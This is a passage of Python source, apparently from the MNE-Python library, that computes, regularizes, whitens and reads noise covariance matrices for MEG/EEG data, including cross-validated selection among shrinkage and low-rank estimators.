'with `method="empirical"`')
for p, v in _method_params.items():
if v.get('assume_centered', None) is False:
raise ValueError('`assume_centered` must be True'
' if `keep_sample_mean` is False')
# prepare mean covs
n_epoch_types = len(epochs)
data_mean = list(np.zeros(n_epoch_types))
n_samples = np.zeros(n_epoch_types, dtype=int)
n_epochs = np.zeros(n_epoch_types, dtype=int)
for ii, epochs_t in enumerate(epochs):
tslice = _get_tslice(epochs_t, tmin, tmax)
for e in epochs_t:
e = e[picks_meeg, tslice]
if not keep_sample_mean:
data_mean[ii] += e
n_samples[ii] += e.shape[1]
n_epochs[ii] += 1
n_samples_epoch = n_samples // n_epochs
norm_const = np.sum(n_samples_epoch * (n_epochs - 1))
data_mean = [1.0 / n_epoch * np.dot(mean, mean.T) for n_epoch, mean
in zip(n_epochs, data_mean)]
if not all(k in accepted_methods for k in method):
raise ValueError(msg.format(method=method))
info = pick_info(info, picks_meeg)
tslice = _get_tslice(epochs[0], tmin, tmax)
epochs = [ee.get_data()[:, picks_meeg, tslice] for ee in epochs]
picks_meeg = np.arange(len(picks_meeg))
picks_list = _picks_by_type(info)
if len(epochs) > 1:
epochs = np.concatenate(epochs, 0)
else:
epochs = epochs[0]
epochs = np.hstack(epochs)
n_samples_tot = epochs.shape[-1]
_check_n_samples(n_samples_tot, len(picks_meeg))
epochs = epochs.T # sklearn | C-order
if ok_sklearn:
cov_data = _compute_covariance_auto(epochs, method=method,
method_params=_method_params,
info=info,
verbose=verbose,
cv=cv,
n_jobs=n_jobs,
# XXX expose later
stop_early=True, # if needed.
picks_list=picks_list,
scalings=scalings)
else:
if _method_params['empirical']['assume_centered'] is True:
cov = epochs.T.dot(epochs) / n_samples_tot
else:
cov = np.cov(epochs.T, bias=1)
cov_data = {'empirical': {'data': cov}}
if keep_sample_mean is False:
cov = cov_data['empirical']['data']
# undo scaling
cov *= n_samples_tot
# ... apply pre-computed class-wise normalization
for mean_cov in data_mean:
cov -= mean_cov
cov /= norm_const
covs = list()
for this_method, data in cov_data.items():
cov = Covariance(None)
cov.update(kind=1, diag=False, dim=len(data['data']), names=ch_names,
data=data.pop('data'), projs=projs, bads=info['bads'],
nfree=n_samples_tot, eig=None, eigvec=None)
logger.info('Number of samples used : %d' % n_samples_tot)
logger.info('[done]')
# add extra info
cov.update(method=this_method, **data)
covs.append(cov)
if ok_sklearn:
msg = ['log-likelihood on unseen data (descending order):']
logliks = [(c['method'], c['loglik']) for c in covs]
logliks.sort(reverse=True, key=lambda c: c[1])
for k, v in logliks:
msg.append('%s: %0.3f' % (k, v))
logger.info('\n '.join(msg))
if ok_sklearn and not return_estimators:
keys, scores = zip(*[(c['method'], c['loglik']) for c in covs])
out = covs[np.argmax(scores)]
logger.info('selecting best estimator: {0}'.format(out['method']))
elif ok_sklearn:
out = covs
out.sort(key=lambda c: c['loglik'], reverse=True)
else:
out = covs[0]
return out
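# Minimal usage sketch (the `epochs` object is hypothetical): let the
# automated model selection described in [1] pick the best regularized
# estimator on the pre-stimulus baseline.
#
#   cov = compute_covariance(epochs, tmin=None, tmax=0., method='auto')
#   print(cov['method'], cov['loglik'])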
def _compute_covariance_auto(data, method, info, method_params, cv,
scalings, n_jobs, stop_early, picks_list,
verbose):
"""docstring for _compute_covariance_auto."""
from sklearn.grid_search import GridSearchCV
from sklearn.covariance import (LedoitWolf, ShrunkCovariance,
EmpiricalCovariance)
# rescale to improve numerical stability
_apply_scaling_array(data.T, picks_list=picks_list, scalings=scalings)
estimator_cov_info = list()
msg = 'Estimating covariance using %s'
_RegCovariance, _ShrunkCovariance = _get_covariance_classes()
for this_method in method:
data_ = data.copy()
name = this_method.__name__ if callable(this_method) else this_method
logger.info(msg % name.upper())
if this_method == 'empirical':
est = EmpiricalCovariance(**method_params[this_method])
est.fit(data_)
_info = None
estimator_cov_info.append((est, est.covariance_, _info))
elif this_method == 'diagonal_fixed':
est = _RegCovariance(info=info, **method_params[this_method])
est.fit(data_)
_info = None
estimator_cov_info.append((est, est.covariance_, _info))
elif this_method == 'ledoit_wolf':
shrinkages = []
lw = LedoitWolf(**method_params[this_method])
for ch_type, picks in picks_list:
lw.fit(data_[:, picks])
shrinkages.append((
ch_type,
lw.shrinkage_,
picks
))
sc = _ShrunkCovariance(shrinkage=shrinkages,
**method_params[this_method])
sc.fit(data_)
_info = None
estimator_cov_info.append((sc, sc.covariance_, _info))
elif this_method == 'shrunk':
shrinkage = method_params[this_method].pop('shrinkage')
tuned_parameters = [{'shrinkage': shrinkage}]
shrinkages = []
gs = GridSearchCV(ShrunkCovariance(**method_params[this_method]),
tuned_parameters, cv=cv)
for ch_type, picks in picks_list:
gs.fit(data_[:, picks])
shrinkages.append((
ch_type,
gs.best_estimator_.shrinkage,
picks
))
sc = _ShrunkCovariance(shrinkage=shrinkages,
**method_params[this_method])
sc.fit(data_)
_info = None
estimator_cov_info.append((sc, sc.covariance_, _info))
elif this_method == 'pca':
mp = method_params[this_method]
pca, _info = _auto_low_rank_model(data_, this_method,
n_jobs=n_jobs,
method_params=mp, cv=cv,
stop_early=stop_early)
pca.fit(data_)
estimator_cov_info.append((pca, pca.get_covariance(), _info))
elif this_method == 'factor_analysis':
mp = method_params[this_method]
fa, _info = _auto_low_rank_model(data_, this_method, n_jobs=n_jobs,
method_params=mp, cv=cv,
stop_early=stop_early)
fa.fit(data_)
estimator_cov_info.append((fa, fa.get_covariance(), _info))
else:
raise ValueError('Unsupported covariance estimation method: %s'
% name)
logger.info('Done.')
logger.info('Using cross-validation to select the best estimator.')
estimators, _, _ = zip(*estimator_cov_info)
logliks = np.array([_cross_val(data, e, cv, n_jobs) for e in estimators])
# undo scaling
for c in estimator_cov_info:
_undo_scaling_cov(c[1], picks_list, scalings)
out = dict()
estimators, covs, runtime_infos = zip(*estimator_cov_info)
cov_methods = [c.__name__ if callable(c) else c for c in method]
runtime_infos, covs = list(runtime_infos), list(covs)
my_zip = zip(cov_methods, runtime_infos, logliks, covs, estimators)
for this_method, runtime_info, loglik, data, est in my_zip:
out[this_method] = {'loglik': loglik, 'data': data, 'estimator': est}
if runtime_info is not None:
out[this_method].update(runtime_info)
return out
def _logdet(A):
"""Compute the log det of a symmetric matrix."""
vals = linalg.eigh(A)[0]
vals = np.abs(vals) # avoid negative values (numerical errors)
return np.sum(np.log(vals))
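# Sanity-check sketch for `_logdet`: on a symmetric positive definite matrix
# it should agree with numpy's slogdet (the matrix below is SPD by
# construction).
#
#   rng = np.random.RandomState(0)
#   X = rng.randn(10, 5)
#   A = np.dot(X.T, X) + np.eye(5)
#   assert np.allclose(_logdet(A), np.linalg.slogdet(A)[1])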
def _gaussian_loglik_scorer(est, X, y=None):
"""Compute the Gaussian log likelihood of X under the model in est."""
# compute empirical covariance of the test set
precision = est.get_precision()
n_samples, n_features = X.shape
log_like = -.5 * (X * (np.dot(X, precision))).sum(axis=1)
log_like -= .5 * (n_features * log(2. * np.pi) - _logdet(precision))
out = np.mean(log_like)
return out
def _cross_val(data, est, cv, n_jobs):
"""Helper to compute cross validation."""
from sklearn.cross_validation import cross_val_score
return np.mean(cross_val_score(est, data, cv=cv, n_jobs=n_jobs,
scoring=_gaussian_loglik_scorer))
def _auto_low_rank_model(data, mode, n_jobs, method_params, cv,
stop_early=True, verbose=None):
"""compute latent variable models."""
method_params = cp.deepcopy(method_params)
iter_n_components = method_params.pop('iter_n_components')
if iter_n_components is None:
iter_n_components = np.arange(5, data.shape[1], 5)
from sklearn.decomposition import PCA, FactorAnalysis
if mode == 'factor_analysis':
est = FactorAnalysis
elif mode == 'pca':
est = PCA
else:
raise ValueError('Come on, this is not a low rank estimator: %s' %
mode)
est = est(**method_params)
est.n_components = 1
scores = np.empty_like(iter_n_components, dtype=np.float64)
scores.fill(np.nan)
# make sure we don't empty the thing if it's a generator
max_n = max(list(cp.deepcopy(iter_n_components)))
if max_n > data.shape[1]:
warnings.warn('You are trying to estimate %i components on matrix '
'with %i features.' % (max_n, data.shape[1]))
for ii, n in enumerate(iter_n_components):
est.n_components = n
try: # this may fail depending on rank and split
score = _cross_val(data=data, est=est, cv=cv, n_jobs=n_jobs)
except ValueError:
score = np.inf
if np.isinf(score) or score > 0:
logger.info('... infinite values encountered. stopping estimation')
break
logger.info('... rank: %i - loglik: %0.3f' % (n, score))
if score != -np.inf:
scores[ii] = score
if (ii >= 3 and np.all(np.diff(scores[ii - 3:ii]) < 0.) and
stop_early is True):
# early stop search when loglik has been going down 3 times
logger.info('early stopping parameter search.')
break
# happens if rank is too low right from the beginning
if np.isnan(scores).all():
raise RuntimeError('Oh no! Could not estimate covariance because all '
'scores were NaN. Please contact the MNE-Python '
'developers.')
i_score = np.nanargmax(scores)
best = est.n_components = iter_n_components[i_score]
logger.info('... best model at rank = %i' % best)
runtime_info = {'ranks': np.array(iter_n_components),
'scores': scores,
'best': best,
'cv': cv}
return est, runtime_info
def _get_covariance_classes():
"""Prepare special cov estimators."""
from sklearn.covariance import (EmpiricalCovariance, shrunk_covariance,
ShrunkCovariance)
class _RegCovariance(EmpiricalCovariance):
"""Aux class."""
def __init__(self, info, grad=0.01, mag=0.01, eeg=0.0,
store_precision=False, assume_centered=False):
self.info = info
self.grad = grad
self.mag = mag
self.eeg = eeg
self.store_precision = store_precision
self.assume_centered = assume_centered
def fit(self, X):
EmpiricalCovariance.fit(self, X)
self.covariance_ = 0.5 * (self.covariance_ + self.covariance_.T)
cov_ = Covariance(None)
cov_['data'] = self.covariance_
cov_['names'] = self.info['ch_names']
cov_['nfree'] = len(self.covariance_)
cov_['bads'] = self.info['bads']
cov_['projs'] = self.info['projs']
cov_['diag'] = False
cov_ = regularize(cov_, self.info, grad=self.grad, mag=self.mag,
eeg=self.eeg, proj=False,
exclude='bads') # ~proj == important!!
self.covariance_ = cov_.data
return self
class _ShrunkCovariance(ShrunkCovariance):
"""Aux class."""
def __init__(self, store_precision, assume_centered, shrinkage=0.1):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.shrinkage = shrinkage
def fit(self, X):
EmpiricalCovariance.fit(self, X)
cov = self.covariance_
if not isinstance(self.shrinkage, (list, tuple)):
shrinkage = [('all', self.shrinkage, np.arange(len(cov)))]
else:
shrinkage = self.shrinkage
zero_cross_cov = np.zeros_like(cov, dtype=bool)
for a, b in itt.combinations(shrinkage, 2):
picks_i, picks_j = a[2], b[2]
ch_ = a[0], b[0]
if 'eeg' in ch_:
zero_cross_cov[np.ix_(picks_i, picks_j)] = True
zero_cross_cov[np.ix_(picks_j, picks_i)] = True
self.zero_cross_cov_ = zero_cross_cov
# Apply shrinkage to blocks
for ch_type, c, picks in shrinkage:
sub_cov = cov[np.ix_(picks, picks)]
cov[np.ix_(picks, picks)] = shrunk_covariance(sub_cov,
shrinkage=c)
# Apply shrinkage to cross-cov
for a, b in itt.combinations(shrinkage, 2):
shrinkage_i, shrinkage_j = a[1], b[1]
picks_i, picks_j = a[2], b[2]
c_ij = np.sqrt((1. - shrinkage_i) * (1. - shrinkage_j))
cov[np.ix_(picks_i, picks_j)] *= c_ij
cov[np.ix_(picks_j, picks_i)] *= c_ij
# Set to zero the necessary cross-cov
if np.any(zero_cross_cov):
cov[zero_cross_cov] = 0.0
self.covariance_ = cov
return self
def score(self, X_test, y=None):
"""Compute the log-likelihood of a Gaussian data set with
`self.covariance_` as an estimator of its covariance matrix.
Parameters
----------
X_test : array-like, shape = [n_samples, n_features]
Test data of which we compute the likelihood, where n_samples
is the number of samples and n_features is the number of
features. X_test is assumed to be drawn from the same
distribution as the data used in fit (including centering).
y : not used, present for API consistence purpose.
Returns
-------
res : float
The likelihood of the data set with `self.covariance_` as an
estimator of its covariance matrix.
"""
from sklearn.covariance import empirical_covariance, log_likelihood
# compute empirical covariance of the test set
test_cov = empirical_covariance(X_test - self.location_,
assume_centered=True)
if np.any(self.zero_cross_cov_):
test_cov[self.zero_cross_cov_] = 0.
res = log_likelihood(test_cov, self.get_precision())
return res
return _RegCovariance, _ShrunkCovariance
###############################################################################
# Writing
def write_cov(fname, cov):
"""Write a noise covariance matrix.
Parameters
----------
fname : string
The name of the file. It should end with -cov.fif or -cov.fif.gz.
cov : Covariance
The noise covariance matrix
See Also
--------
read_cov
"""
cov.save(fname)
###############################################################################
# Prepare for inverse modeling
def _unpack_epochs(epochs):
"""Aux Function."""
if len(epochs.event_id) > 1:
epochs = [epochs[k] for k in epochs.event_id]
else:
epochs = [epochs]
return epochs
def _get_ch_whitener(A, pca, ch_type, rank):
""""Get whitener params for a set of channels."""
# whitening operator
eig, eigvec = linalg.eigh(A, overwrite_a=True)
eigvec = eigvec.T
eig[:-rank] = 0.0
logger.info('Setting small %s eigenvalues to zero.' % ch_type)
if not pca: # No PCA case.
logger.info('Not doing PCA for %s.' % ch_type)
else:
logger.info('Doing PCA for %s.' % ch_type)
# This line will reduce the actual number of variables in data
# and leadfield to the true rank.
eigvec = eigvec[:-rank].copy()
return eig, eigvec
@verbose
def prepare_noise_cov(noise_cov, info, ch_names, rank=None,
scalings=None, verbose=None):
"""Prepare noise covariance matrix.
Parameters
----------
noise_cov : Covariance
The noise covariance to process.
info : dict
The measurement info (used to get channel types and bad channels).
ch_names : list
The channel names to be considered.
rank : None | int | dict
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None
Data will be rescaled before rank estimation to improve accuracy.
If dict, it will override the following dict (default if None):
dict(mag=1e12, grad=1e11, eeg=1e5)
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
"""
C_ch_idx = [noise_cov.ch_names.index(c) for c in ch_names]
if noise_cov['diag'] is False:
C = noise_cov.data[np.ix_(C_ch_idx, C_ch_idx)]
else:
C = np.diag(noise_cov.data[C_ch_idx])
scalings = _handle_default('scalings_cov_rank', scalings)
# Create the projection operator
proj, ncomp, _ = make_projector(info['projs'], ch_names)
if ncomp > 0:
logger.info(' Created an SSP operator (subspace dimension = %d)'
% ncomp)
C = np.dot(proj, np.dot(C, proj.T))
pick_meg = pick_types(info, meg=True, eeg=False, ref_meg=False,
exclude='bads')
pick_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude='bads')
meg_names = [info['chs'][k]['ch_name'] for k in pick_meg]
C_meg_idx = [k for k in range(len(C)) if ch_names[k] in meg_names]
eeg_names = [info['chs'][k]['ch_name'] for k in pick_eeg]
C_eeg_idx = [k for k in range(len(C)) if ch_names[k] in eeg_names]
has_meg = len(C_meg_idx) > 0
has_eeg = len(C_eeg_idx) > 0
# Get the specified noise covariance rank
if rank is not None:
if isinstance(rank, dict):
rank_meg = rank.get('meg', None)
rank_eeg = rank.get('eeg', None)
else:
rank_meg = int(rank)
rank_eeg = None
else:
rank_meg, rank_eeg = None, None
if has_meg:
C_meg = C[np.ix_(C_meg_idx, C_meg_idx)]
this_info = pick_info(info, pick_meg)
if rank_meg is None:
if len(C_meg_idx) < len(pick_meg):
this_info = pick_info(info, C_meg_idx)
rank_meg = _estimate_rank_meeg_cov(C_meg, this_info, scalings)
C_meg_eig, C_meg_eigvec = _get_ch_whitener(C_meg, False, 'MEG',
rank_meg)
if has_eeg:
C_eeg = C[np.ix_(C_eeg_idx, C_eeg_idx)]
this_info = pick_info(info, pick_eeg)
if rank_eeg is None:
if len(C_eeg_idx) < len(pick_eeg):
this_info = pick_info(info, C_eeg_idx)
rank_eeg = _estimate_rank_meeg_cov(C_eeg, this_info, scalings)
C_eeg_eig, C_eeg_eigvec = _get_ch_whitener(C_eeg, False, 'EEG',
rank_eeg)
if not _has_eeg_average_ref_proj(info['projs']):
warnings.warn('No average EEG reference present in info["projs"], '
'covariance may be adversely affected. Consider '
'recomputing covariance using a raw file with an '
'average eeg reference projector added.')
n_chan = len(ch_names)
eigvec = np.zeros((n_chan, n_chan), dtype=float)
eig = np.zeros(n_chan, dtype=float)
if has_meg:
eigvec[np.ix_(C_meg_idx, C_meg_idx)] = C_meg_eigvec
eig[C_meg_idx] = C_meg_eig
if has_eeg:
eigvec[np.ix_(C_eeg_idx, C_eeg_idx)] = C_eeg_eigvec
eig[C_eeg_idx] = C_eeg_eig
assert(len(C_meg_idx) + len(C_eeg_idx) == n_chan)
noise_cov = cp.deepcopy(noise_cov)
noise_cov.update(data=C, eig=eig, eigvec=eigvec, dim=len(ch_names),
diag=False, names=ch_names)
return noise_cov
def regularize(cov, info, mag=0.1, grad=0.1, eeg=0.1, exclude='bads',
proj=True, verbose=None):
"""Regularize noise covariance matrix.
This method works by adding a constant to the diagonal for each
channel type separately. Special care is taken to keep the
rank of the data constant.
**Note:** This function is kept for reasons of backward-compatibility.
Please consider explicitly using the ``method`` parameter in
`compute_covariance` to directly combine estimation with regularization
in a data-driven fashion; see the
`faq <http://martinos.org/mne/dev/faq.html#how-should-i-regularize-the-covariance-matrix>`_
for more information.
Parameters
----------
cov : Covariance
The noise covariance matrix.
info : dict
The measurement info (used to get channel types and bad channels).
mag : float (default 0.1)
Regularization factor for MEG magnetometers.
grad : float (default 0.1)
Regularization factor for MEG gradiometers.
eeg : float (default 0.1)
Regularization factor for EEG.
exclude : list | 'bads' (default 'bads')
List of channels to mark as bad. If 'bads', bad channels
are extracted from both info['bads'] and cov['bads'].
proj : bool (default True)
Whether to apply projections to keep the rank of the data.
verbose : bool | str | int | None (default None)
If not None, override default verbose level (see mne.verbose).
Returns
-------
reg_cov : Covariance
The regularized covariance matrix.
See Also
--------
compute_covariance
""" # noqa
cov = cp.deepcopy(cov)
info._check_consistency()
if exclude is None:
raise ValueError('exclude must be a list of strings or "bads"')
if exclude == 'bads':
exclude = info['bads'] + cov['bads']
sel_eeg = pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=exclude)
sel_mag = pick_types(info, meg='mag', eeg=False, ref_meg=False,
exclude=exclude)
sel_grad = pick_types(info, meg='grad', eeg=False, ref_meg=False,
exclude=exclude)
info_ch_names = info['ch_names']
ch_names_eeg = [info_ch_names[i] for i in sel_eeg]
ch_names_mag = [info_ch_names[i] for i in sel_mag]
ch_names_grad = [info_ch_names[i] for i in sel_grad]
# This actually removes bad channels from the cov, which is not backward
# compatible, so let's leave all channels in
cov_good = pick_channels_cov(cov, include=info_ch_names, exclude=exclude)
ch_names = cov_good.ch_names
idx_eeg, idx_mag, idx_grad = [], [], []
for i, ch in enumerate(ch_names):
if ch in ch_names_eeg:
idx_eeg.append(i)
elif ch in ch_names_mag:
idx_mag.append(i)
elif ch in ch_names_grad:
idx_grad.append(i)
else:
            raise ValueError('channel %s is of unknown type' % ch)
C = cov_good['data']
assert len(C) == (len(idx_eeg) + len(idx_mag) + len(idx_grad))
if proj:
projs = info['projs'] + cov_good['projs']
projs = activate_proj(projs)
for desc, idx, reg in [('EEG', idx_eeg, eeg), ('MAG', idx_mag, mag),
('GRAD', idx_grad, grad)]:
if len(idx) == 0 or reg == 0.0:
logger.info(" %s regularization : None" % desc)
continue
logger.info(" %s regularization : %s" % (desc, reg))
this_C = C[np.ix_(idx, idx)]
if proj:
this_ch_names = [ch_names[k] for k in idx]
P, ncomp, _ = make_projector(projs, this_ch_names)
U = linalg.svd(P)[0][:, :-ncomp]
if ncomp > 0:
logger.info(' Created an SSP operator for %s '
'(dimension = %d)' % (desc, ncomp))
this_C = np.dot(U.T, np.dot(this_C, U))
sigma = np.mean(np.diag(this_C))
this_C.flat[::len(this_C) + 1] += reg * sigma # modify diag inplace
if proj and ncomp > 0:
this_C = np.dot(U, np.dot(this_C, U.T))
C[np.ix_(idx, idx)] = this_C
# Put data back in correct locations
idx = pick_channels(cov.ch_names, info_ch_names, exclude=exclude)
cov['data'][np.ix_(idx, idx)] = C
return cov
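# Illustrative sketch (hypothetical helper, not part of this module's API):
# the heart of ``regularize`` is diagonal loading. Adding ``reg`` times the
# mean diagonal power to the diagonal shifts every eigenvalue up by exactly
# that amount while leaving the eigenvectors unchanged.
def _sketch_diagonal_loading(reg=0.1):
    import numpy as np
    rng = np.random.RandomState(42)
    C = np.cov(rng.randn(5, 100))
    sigma = np.mean(np.diag(C))
    C_reg = C.copy()
    C_reg.flat[::len(C_reg) + 1] += reg * sigma  # same in-place trick as above
    # every eigenvalue is shifted up by exactly reg * sigma
    shift = np.linalg.eigvalsh(C_reg) - np.linalg.eigvalsh(C)
    assert np.allclose(shift, reg * sigma)
    return C_reg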
def _regularized_covariance(data, reg=None):
"""Compute a regularized covariance from data using sklearn.
Parameters
----------
data : ndarray, shape (n_channels, n_times)
Data for covariance estimation.
reg : float | str | None (default None)
        If not None, allow regularization for covariance estimation.
        If float, shrinkage covariance is used (0 <= shrinkage <= 1).
        If str, optimal shrinkage using Ledoit-Wolf shrinkage
        ('ledoit_wolf') or Oracle Approximating Shrinkage ('oas') is used.
Returns
-------
cov : ndarray, shape (n_channels, n_channels)
The covariance matrix.
"""
if reg is None:
# compute empirical covariance
cov = np.cov(data)
else:
no_sklearn_err = ('the scikit-learn package is missing and '
'required for covariance regularization.')
# use sklearn covariance estimators
if isinstance(reg, float):
if (reg < 0) or (reg > 1):
raise ValueError('0 <= shrinkage <= 1 for '
'covariance regularization.')
try:
import sklearn
sklearn_version = LooseVersion(sklearn.__version__)
from sklearn.covariance import ShrunkCovariance
except ImportError:
raise Exception(no_sklearn_err)
if sklearn_version < '0.12':
skl_cov = ShrunkCovariance(shrinkage=reg,
store_precision=False)
else:
# init sklearn.covariance.ShrunkCovariance estimator
skl_cov = ShrunkCovariance(shrinkage=reg,
store_precision=False,
assume_centered=True)
elif isinstance(reg, six.string_types):
if reg == 'ledoit_wolf':
try:
from sklearn.covariance import LedoitWolf
except ImportError:
raise Exception(no_sklearn_err)
# init sklearn.covariance.LedoitWolf estimator
skl_cov = LedoitWolf(store_precision=False,
assume_centered=True)
elif reg == 'oas':
try:
from sklearn.covariance import OAS
except ImportError:
raise Exception(no_sklearn_err)
# init sklearn.covariance.OAS estimator
skl_cov = OAS(store_precision=False,
assume_centered=True)
else:
raise ValueError("regularization parameter should be "
"'lwf' or 'oas'")
else:
raise ValueError("regularization parameter should be "
"of type str or int (got %s)." % type(reg))
# compute regularized covariance using sklearn
cov = skl_cov.fit(data.T).covariance_
return cov
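# Illustrative sketch (hypothetical helper, not part of this module's API):
# what the float branch above asks ShrunkCovariance to compute, written out
# in plain NumPy under the assume_centered=True convention: the empirical
# covariance is X X^T / n_times and the shrunk estimate is
# (1 - a) * S + a * mu * I with mu = trace(S) / n_channels.
def _sketch_shrunk_covariance(a=0.2):
    import numpy as np
    rng = np.random.RandomState(0)
    data = rng.randn(4, 200)  # (n_channels, n_times), zero mean
    n_ch, n_times = data.shape
    S = data.dot(data.T) / n_times
    mu = np.trace(S) / n_ch
    return (1. - a) * S + a * mu * np.eye(n_ch)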
@verbose
def compute_whitener(noise_cov, info, picks=None, rank=None,
                     scalings=None, verbose=None):
"""Compute whitening matrix.
Parameters
----------
noise_cov : Covariance
The noise covariance.
info : dict
The measurement info.
picks : array-like of int | None
        The channel indices to include. If None, the data
channels in info, except bad channels, are used.
rank : None | int | dict
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None
The rescaling method to be applied. See documentation of
``prepare_noise_cov`` for details.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
W : 2d array
The whitening matrix.
ch_names : list
The channel names.
"""
if picks is None:
picks = pick_types(info, meg=True, eeg=True, ref_meg=False,
exclude='bads')
ch_names = [info['chs'][k]['ch_name'] for k in picks]
noise_cov = cp.deepcopy(noise_cov)
noise_cov = prepare_noise_cov(noise_cov, info, ch_names,
rank=rank, scalings=scalings)
n_chan = len(ch_names)
    W = np.zeros((n_chan, n_chan), dtype=float)
#
# Omit the zeroes due to projection
#
eig = noise_cov['eig']
nzero = (eig > 0)
W[nzero, nzero] = 1.0 / np.sqrt(eig[nzero])
#
# Rows of eigvec are the eigenvectors
#
W = np.dot(W, noise_cov['eigvec'])
W = np.dot(noise_cov['eigvec'].T, W)
return W, ch_names
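# Illustrative sketch (hypothetical helper, not part of this module's API):
# the whitener built above is W = V.T diag(1 / sqrt(eig)) V, with the rows
# of V being the eigenvectors of the covariance, so W C W.T is the identity
# on the non-degenerate subspace (here the covariance is full rank, so no
# eigenvalues need to be zeroed out).
def _sketch_whitener():
    import numpy as np
    rng = np.random.RandomState(1)
    A = rng.randn(5, 5)
    C = A.dot(A.T)  # full-rank SPD covariance
    eig, vecs = np.linalg.eigh(C)
    eigvec = vecs.T  # rows are eigenvectors, as in noise_cov['eigvec']
    W = np.diag(1.0 / np.sqrt(eig))
    W = np.dot(W, eigvec)
    W = np.dot(eigvec.T, W)
    assert np.allclose(W.dot(C).dot(W.T), np.eye(len(eig)))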
@verbose
def whiten_evoked(evoked, noise_cov, picks=None, diag=False, rank=None,
scalings=None, verbose=None):
"""Whiten evoked data using given noise covariance.
Parameters
----------
    evoked : instance of Evoked
        The evoked data.
    noise_cov : instance of Covariance
        The noise covariance.
picks : array-like of int | None
The channel indices to whiten. Can be None to whiten MEG and EEG
data.
diag : bool (default False)
If True, whiten using only the diagonal of the covariance.
rank : None | int | dict (default None)
Specified rank of the noise covariance matrix. If None, the rank is
detected automatically. If int, the rank is specified for the MEG
channels. A dictionary with entries 'eeg' and/or 'meg' can be used
to specify the rank for each modality.
scalings : dict | None (default None)
To achieve reliable rank estimation on multiple sensors,
sensors have to be rescaled. This parameter controls the
rescaling. If dict, it will override the
following default dict (default if None):
dict(mag=1e12, grad=1e11, eeg=1e5)
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
evoked_white : instance of Evoked
The whitened evoked data.
"""
evoked = cp.deepcopy(evoked)
if picks is None:
picks = pick_types(evoked.info, meg=True, eeg=True)
W = _get_whitener_data(evoked.info, noise_cov, picks,
diag, rank, scalings, evoked.nave)
evoked.data[picks] = np.sqrt(evoked.nave) * np.dot(W, evoked.data[picks])
return evoked
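# Illustrative sketch (hypothetical helper, not part of this module's API):
# why ``whiten_evoked`` multiplies by sqrt(nave). The evoked response is an
# average over ``nave`` epochs, so independent sensor noise that matches
# ``noise_cov`` at the single-epoch level has its variance divided by nave
# after averaging; the sqrt(nave) factor restores unit variance.
def _sketch_nave_scaling(nave=50, n_samples=10000):
    import numpy as np
    rng = np.random.RandomState(2)
    epochs = rng.randn(nave, n_samples)  # unit-variance noise epochs
    evoked_noise = epochs.mean(axis=0)   # std shrinks to ~1 / sqrt(nave)
    assert abs(evoked_noise.std() * np.sqrt(nave) - 1.0) < 0.05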
@verbose
def _get_whitener_data(info, noise_cov, picks, diag=False, rank=None,
scalings=None, verbose=None):
"""Get whitening matrix for a set of data."""
ch_names = [info['ch_names'][k] for k in picks]
noise_cov = pick_channels_cov(noise_cov, include=ch_names, exclude=[])
info = pick_info(info, picks)
if diag:
noise_cov = cp.deepcopy(noise_cov)
noise_cov['data'] = np.diag(np.diag(noise_cov['data']))
scalings = _handle_default('scalings_cov_rank', scalings)
W = compute_whitener(noise_cov, info, rank=rank, scalings=scalings)[0]
return W
@verbose
def _read_cov(fid, node, cov_kind, verbose=None):
"""Read a noise covariance matrix."""
# Find all covariance matrices
covs = dir_tree_find(node, FIFF.FIFFB_MNE_COV)
if len(covs) == 0:
raise ValueError('No covariance matrices found')
# Is any of the covariance matrices a noise covariance
for p in range(len(covs)):
tag = find_tag(fid, covs[p], FIFF.FIFF_MNE_COV_KIND)
if tag is not None and int(tag.data) == cov_kind:
this = covs[p]
# Find all the necessary data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_DIM)
if tag is None:
raise ValueError('Covariance matrix dimension not found')
dim = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_NFREE)
if tag is None:
nfree = -1
else:
nfree = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_METHOD)
if tag is None:
method = None
else:
method = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_SCORE)
if tag is None:
score = None
else:
score = tag.data[0]
tag = find_tag(fid, this, FIFF.FIFF_MNE_ROW_NAMES)
if tag is None:
names = []
else:
names = tag.data.split(':')
if len(names) != dim:
raise ValueError('Number of names does not match '
'covariance matrix dimension')
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_COV_DIAG)
if tag is None:
raise ValueError('No covariance matrix data found')
else:
# Diagonal is stored
data = tag.data
diagmat = True
logger.info(' %d x %d diagonal covariance (kind = '
'%d) found.' % (dim, dim, cov_kind))
else:
from scipy import sparse
if not sparse.issparse(tag.data):
# Lower diagonal is stored
vals = tag.data
data = np.zeros((dim, dim))
data[np.tril(np.ones((dim, dim))) > 0] = vals
data = data + data.T
data.flat[::dim + 1] /= 2.0
diagmat = False
logger.info(' %d x %d full covariance (kind = %d) '
'found.' % (dim, dim, cov_kind))
else:
diagmat = False
data = tag.data
logger.info(' %d x %d sparse covariance (kind = %d)'
' found.' % (dim, dim, cov_kind))
# Read the possibly precomputed decomposition
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_COV_EIGENVALUES)
tag2 = find_tag(fid, this, FIFF.FIFF_MNE_COV_EIGENVECTORS)
if tag1 is not None and tag2 is not None:
eig = tag1.data
eigvec = tag2.data
else:
eig = None
eigvec = None
# Read the projection operator
projs = _read_proj(fid, this)
# Read the bad channel list
bads = read_bad_channels(fid, this)
# Put it together
cov = dict(kind=cov_kind, diag=diagmat, dim=dim, names=names,
data=data, projs=projs, bads=bads, nfree=nfree, eig=eig,
eigvec=eigvec)
if score is not None:
cov['loglik'] = score
if method is not None:
cov['method'] = method
return cov
